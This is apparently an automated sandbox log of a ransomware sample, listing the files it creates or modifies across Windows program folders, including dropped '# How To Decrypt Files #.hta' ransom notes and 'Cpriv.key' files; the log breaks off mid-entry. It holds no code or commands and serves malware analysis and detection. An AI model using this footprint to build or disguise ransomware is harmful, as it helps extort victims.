de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR23F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282928.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceAmharic.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15060_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293800.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107148.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00656_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Newsprint.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPreviewTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187849.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14531_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBHD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099151.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239941.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BANNER.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALNDR98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SUMIPNTG\SUMIPNTG.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MML2OMML.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Generic.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR26F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\FAX\UrbanFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\chrome_200_percent.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\docs.crx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18199_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\ROGERS.COM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297759.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.OPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSTORE_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\XLMACRO.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\NETWORK\NETWORK.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199609.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00938_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102002.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGHEADING.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21323_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\DataServices\+NewSQLServerConnection.odc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\NOTES.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSTORY.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01149_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02384_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14692_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ASCIIENG.LNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02077_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSPUB.TLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR5F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188511.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.en\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Photo Viewer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00236_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBORDER.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\1.7\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\203x8subpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN090.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\el\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.WW\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification 